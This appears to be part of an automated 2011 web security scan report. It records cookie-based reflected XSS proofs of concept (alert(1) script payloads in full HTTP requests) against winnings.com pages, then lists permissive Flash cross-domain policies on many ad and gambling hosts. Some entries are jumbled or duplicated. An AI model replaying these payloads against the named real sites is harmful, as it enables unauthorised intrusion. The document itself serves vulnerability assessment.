Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733ff193</script><script>alert(1)</script>b44d02d0aa1; winnings[cc]=US;

Response

3.457. http://www.winnings.com/how-to-win-money [winnings[vid] cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/how-to-win-money

Issue detail

The value of the winnings[vid] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 796da"><script>alert(1)</script>021a26d9653 was submitted in the winnings[vid] cookie. This input was echoed as 796da\"><script>alert(1)</script>021a26d9653 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /how-to-win-money HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129796da"><script>alert(1)</script>021a26d9653; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

3.458. http://www.winnings.com/instant-games [winnings[sessionId] cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/instant-games

Issue detail

The value of the winnings[sessionId] cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8dacc</script><script>alert(1)</script>7e9442ab16a was submitted in the winnings[sessionId] cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /instant-games HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=1031227338dacc</script><script>alert(1)</script>7e9442ab16a; winnings[cc]=US;

Response

3.459. http://www.winnings.com/instant-games [winnings[sessionId] cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/instant-games

Remediation detail

Request

GET /lottery-scratch-cards HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733374e4</script><script>alert(1)</script>301043e4eec; winnings[cc]=US;

Response

3.462. http://www.winnings.com/lottery-scratch-cards [winnings[vid] cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/lottery-scratch-cards

Issue detail

The value of the winnings[vid] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f0d8"><script>alert(1)</script>6a70eac04a5 was submitted in the winnings[vid] cookie. This input was echoed as 8f0d8\"><script>alert(1)</script>6a70eac04a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /lottery-scratch-cards HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=5401298f0d8"><script>alert(1)</script>6a70eac04a5; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

3.463. http://www.winnings.com/scratch-cards [winnings[sessionId] cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/scratch-cards

Issue detail

The value of the winnings[sessionId] cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 811ff</script><script>alert(1)</script>e5827f88a7b was submitted in the winnings[sessionId] cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /scratch-cards HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733811ff</script><script>alert(1)</script>e5827f88a7b; winnings[cc]=US;

Response

3.464. http://www.winnings.com/scratch-cards [winnings[sessionId] cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/scratch-cards

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/slots

Issue detail

The value of the winnings[sessionId] cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24733</script><script>alert(1)</script>c2b9a603bf9 was submitted in the winnings[sessionId] cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /slots HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=10312273324733</script><script>alert(1)</script>c2b9a603bf9; winnings[cc]=US;

Response

3.469. http://www.winnings.com/slots [winnings[vid] cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/slots

Issue detail

The value of the winnings[vid] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88f7f"><script>alert(1)</script>17019db4cca was submitted in the winnings[vid] cookie. This input was echoed as 88f7f\"><script>alert(1)</script>17019db4cca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /slots HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=54012988f7f"><script>alert(1)</script>17019db4cca; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

4. Flash cross-domain policy previous next
There are 144 instances of this issue:

http://ad-emea.doubleclick.net/crossdomain.xml
http://ad.doubleclick.net/crossdomain.xml
http://b.scorecardresearch.com/crossdomain.xml
http://bingo.bet365.com/crossdomain.xml
https://bingo.betsson.com/crossdomain.xml
http://c.betrad.com/crossdomain.xml
http://casino.bet365.com/crossdomain.xml
http://d.tradex.openx.com/crossdomain.xml
http://d.xp1.ru4.com/crossdomain.xml
http://games.bet365.com/crossdomain.xml
http://getclicky.com/crossdomain.xml
http://in.getclicky.com/crossdomain.xml
https://in.getclicky.com/crossdomain.xml
http://l.betrad.com/crossdomain.xml
http://log30.doubleverify.com/crossdomain.xml
http://m.xp1.ru4.com/crossdomain.xml
http://neogames-tech.com/crossdomain.xml
http://pixel.invitemedia.com/crossdomain.xml
http://pixel.quantserve.com/crossdomain.xml
http://platform.ak.fbcdn.net/crossdomain.xml
http://poker.bet365.com/crossdomain.xml
http://res.mccont.com/crossdomain.xml
http://s.mcstatic.com/crossdomain.xml
http://s0.2mdn.net/crossdomain.xml
http://s1.mcstatic.com/crossdomain.xml
http://s3.mcstatic.com/crossdomain.xml
http://s4.mcstatic.com/crossdomain.xml
http://s6.mcstatic.com/crossdomain.xml
http://secure-us.imrworldwide.com/crossdomain.xml
http://spe.atdmt.com/crossdomain.xml
http://static.getclicky.com/crossdomain.xml
https://static.getclicky.com/crossdomain.xml
http://va.px.invitemedia.com/crossdomain.xml
http://winter.metacafe.com/crossdomain.xml
https://www.betsson.com/crossdomain.xml
http://www.huddletogether.com/crossdomain.xml
http://www.metacafe.com/crossdomain.xml
http://www.neogames.com/crossdomain.xml
http://bigmoneyscratch.com/crossdomain.xml
http://br.bigmoneyscratch.com/crossdomain.xml
http://br.karamba.com/crossdomain.xml
http://da.bigmoneyscratch.com/crossdomain.xml
http://da.crazyscratch.com/crossdomain.xml
http://da.karamba.com/crossdomain.xml
http://da.scratch2cash.com/crossdomain.xml
http://da.scratchcardheaven.com/crossdomain.xml
http://de.bigmoneyscratch.com/crossdomain.xml
http://de.crazyscratch.com/crossdomain.xml
http://de.karamba.com/crossdomain.xml
http://de.scratch2cash.com/crossdomain.xml
http://de.scratchcardheaven.com/crossdomain.xml
http://download.neogames-tech.com/crossdomain.xml
https://download.neogames-tech.com/crossdomain.xml
http://el.crazyscratch.com/crossdomain.xml
http://el.karamba.com/crossdomain.xml
http://en.bigmoneyscratch.com/crossdomain.xml
http://en.crazyscratch.com/crossdomain.xml
http://en.info.winnings.com/crossdomain.xml
http://en.karamba.com/crossdomain.xml
http://en.scratch2cash.com/crossdomain.xml
http://en.scratchcardheaven.com/crossdomain.xml
http://es.bigmoneyscratch.com/crossdomain.xml
http://es.crazyscratch.com/crossdomain.xml
http://es.karamba.com/crossdomain.xml
http://es.scratch2cash.com/crossdomain.xml
http://es.scratchcardheaven.com/crossdomain.xml
http://feeds.bbci.co.uk/crossdomain.xml
http://fi.bigmoneyscratch.com/crossdomain.xml
http://fi.crazyscratch.com/crossdomain.xml
http://fi.karamba.com/crossdomain.xml
http://fi.scratchcardheaven.com/crossdomain.xml
http://fr.bigmoneyscratch.com/crossdomain.xml
http://fr.crazyscratch.com/crossdomain.xml
http://fr.karamba.com/crossdomain.xml
http://fr.scratch2cash.com/crossdomain.xml
http://fr.scratchcardheaven.com/crossdomain.xml
http://home.okscratchcards.com/crossdomain.xml
http://hu.crazyscratch.com/crossdomain.xml
http://it.bigmoneyscratch.com/crossdomain.xml
http://it.crazyscratch.com/crossdomain.xml
http://it.karamba.com/crossdomain.xml
http://it.scratch2cash.com/crossdomain.xml
http://it.scratchcardheaven.com/crossdomain.xml
http://itunes.apple.com/crossdomain.xml
http://karamba.com/crossdomain.xml
http://mundirasca.com/crossdomain.xml
http://nettiarpa.com/crossdomain.xml
http://newsrss.bbc.co.uk/crossdomain.xml
http://nl.bigmoneyscratch.com/crossdomain.xml
http://nl.crazyscratch.com/crossdomain.xml
http://nl.karamba.com/crossdomain.xml
http://nl.scratch2cash.com/crossdomain.xml
http://nl.scratchcardheaven.com/crossdomain.xml
http://no.bigmoneyscratch.com/crossdomain.xml
http://no.crazyscratch.com/crossdomain.xml
http://no.karamba.com/crossdomain.xml
http://no.scratchcardheaven.com/crossdomain.xml
http://optimized-by.rubiconproject.com/crossdomain.xml
http://pagead2.googlesyndication.com/crossdomain.xml
http://primescratchcards.com/crossdomain.xml
http://pt.bigmoneyscratch.com/crossdomain.xml
http://pt.crazyscratch.com/crossdomain.xml
http://pt.karamba.com/crossdomain.xml
http://pt.scratch2cash.com/crossdomain.xml
http://pt.scratchcardheaven.com/crossdomain.xml
http://pubads.g.doubleclick.net/crossdomain.xml
https://secure.neogames-tech.com/crossdomain.xml
http://server.iad.liveperson.net/crossdomain.xml
http://static.ak.fbcdn.net/crossdomain.xml
http://sv.bigmoneyscratch.com/crossdomain.xml
http://sv.crazyscratch.com/crossdomain.xml
http://sv.karamba.com/crossdomain.xml
http://sv.scratch2cash.com/crossdomain.xml
http://sv.scratchcardheaven.com/crossdomain.xml
http://svenskalotter.com/crossdomain.xml
http://video.google.com/crossdomain.xml
http://www.adobe.com/crossdomain.xml
http://www.apple.com/crossdomain.xml
http://www.bigmoneyscratch.com/crossdomain.xml
http://www.crazyscratch.com/crossdomain.xml
http://www.facebook.com/crossdomain.xml
http://www.hopa.com/crossdomain.xml
http://www.info.crazyscratch.com/crossdomain.xml
http://www.info.winnings.com/crossdomain.xml
http://www.karamba.com/crossdomain.xml
http://www.maestrocard.com/crossdomain.xml
http://www.mundirasca.com/crossdomain.xml
http://www.pclscratch.com/crossdomain.xml
http://www.primegrattage.com/crossdomain.xml
http://www.primescratchcards.com/crossdomain.xml
http://www.scratch2cash.com/crossdomain.xml
http://www.scratchcardheaven.com/crossdomain.xml
http://www.svenskalotter.com/crossdomain.xml
http://www.youtube.com/crossdomain.xml
http://api.twitter.com/crossdomain.xml
https://casino.betsson.com/crossdomain.xml
https://games.betsson.com/crossdomain.xml
https://livecasino.betsson.com/crossdomain.xml
http://members.bet365.com/crossdomain.xml
https://members.bet365.com/crossdomain.xml
https://poker.betsson.com/crossdomain.xml
https://scratch.betsson.com/crossdomain.xml
http://twitter.com/crossdomain.xml
https://www.norskelodd.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

4.1. http://ad-emea.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 393
Last-Modified: Wed, 22 Oct 2008 18:22:36 GMT
Date: Mon, 16 May 2011 11:41:04 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.2. http://ad.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Mon, 16 May 2011 12:49:31 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.3. http://b.scorecardresearch.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 17 May 2011 12:49:29 GMT
Date: Mon, 16 May 2011 12:49:29 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.4. http://bingo.bet365.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bingo.bet365.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bingo.bet365.com

Response

HTTP/1.1 200 OK
Content-Length: 234
Content-Type: text/xml
Last-Modified: Wed, 15 Oct 2008 15:52:03 GMT
Accept-Ranges: bytes
ETag: "80d364f7dd2ec91:6dc0"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:35:36 GMT
Connection: keep-alive

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.5. https://bingo.betsson.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://bingo.betsson.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bingo.betsson.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/xml
Expires: Tue, 17 May 2011 08:32:00 GMT
Last-Modified: Wed, 12 Jan 2011 16:05:16 GMT
Accept-Ranges: bytes
ETag: "1CBB27280604600"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:58:52 GMT
Connection: close
Content-Length: 378

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-po
...[SNIP]...
<allow-access-from domain="192.168.104.199"/>
<allow-access-from domain="betsson.hs.llnwd.net"/>
<allow-access-from domain="*"/>
...[SNIP]...

4.6. http://c.betrad.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c.betrad.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "623d3896f3768c2bad5e01980f958d0a:1298927864"
Last-Modified: Mon, 28 Feb 2011 21:17:44 GMT
Accept-Ranges: bytes
Content-Length: 204
Content-Type: application/xml
Date: Mon, 16 May 2011 12:52:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.7. http://casino.bet365.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://casino.bet365.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: casino.bet365.com

Response

HTTP/1.1 200 OK
Content-Length: 234
Content-Type: text/xml
Last-Modified: Wed, 15 Oct 2008 15:52:03 GMT
Accept-Ranges: bytes
ETag: "80d364f7dd2ec91:7066"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:32:32 GMT
Connection: keep-alive

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.8. http://d.tradex.openx.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.tradex.openx.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d.tradex.openx.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:09 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT
ETag: "60fa3-c7-497e11c2d28c0"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.9. http://d.xp1.ru4.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 12:52:13 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:31:41 GMT
Content-length: 202
Etag: "ca-4ceae13d"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

4.10. http://games.bet365.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://games.bet365.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: games.bet365.com

Response

HTTP/1.1 200 OK
Content-Length: 234
Content-Type: text/xml
Last-Modified: Wed, 15 Oct 2008 15:52:03 GMT
Accept-Ranges: bytes
ETag: "80d364f7dd2ec91:6dc0"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:02:24 GMT
Connection: keep-alive

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.11. http://getclicky.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://getclicky.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: getclicky.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:45:21 GMT
Server: Apache
Last-Modified: Thu, 28 Jun 2007 14:35:20 GMT
ETag: "958b98-c9-433f845a21a00"
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.12. http://in.getclicky.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://in.getclicky.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: in.getclicky.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:41:35 GMT
Server: Apache
Last-Modified: Tue, 30 Nov 2010 03:42:11 GMT
ETag: "5d8140-c9-4963cf9438ac0"
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.13. https://in.getclicky.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://in.getclicky.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: in.getclicky.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:18 GMT
Server: Apache
Last-Modified: Tue, 30 Nov 2010 03:42:11 GMT
ETag: "5d8140-c9-4963cf9438ac0"
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.14. http://l.betrad.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://l.betrad.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: l.betrad.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Type: text/xml
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 212

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-do
...[SNIP]...

4.15. http://log30.doubleverify.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://log30.doubleverify.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:53:27 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.16. http://m.xp1.ru4.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://m.xp1.ru4.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: m.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 12:52:11 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:05 GMT
Content-length: 202
Etag: "ca-4ceae155"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

4.17. http://neogames-tech.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://neogames-tech.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: neogames-tech.com

Response

HTTP/1.1 200 OK
Content-Length: 287
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 11:24:37 GMT
Accept-Ranges: bytes
ETag: "34cdc3c714becb1:b9f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:38:41 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

4.18. http://pixel.invitemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 12:52:09 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.19. http://pixel.quantserve.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
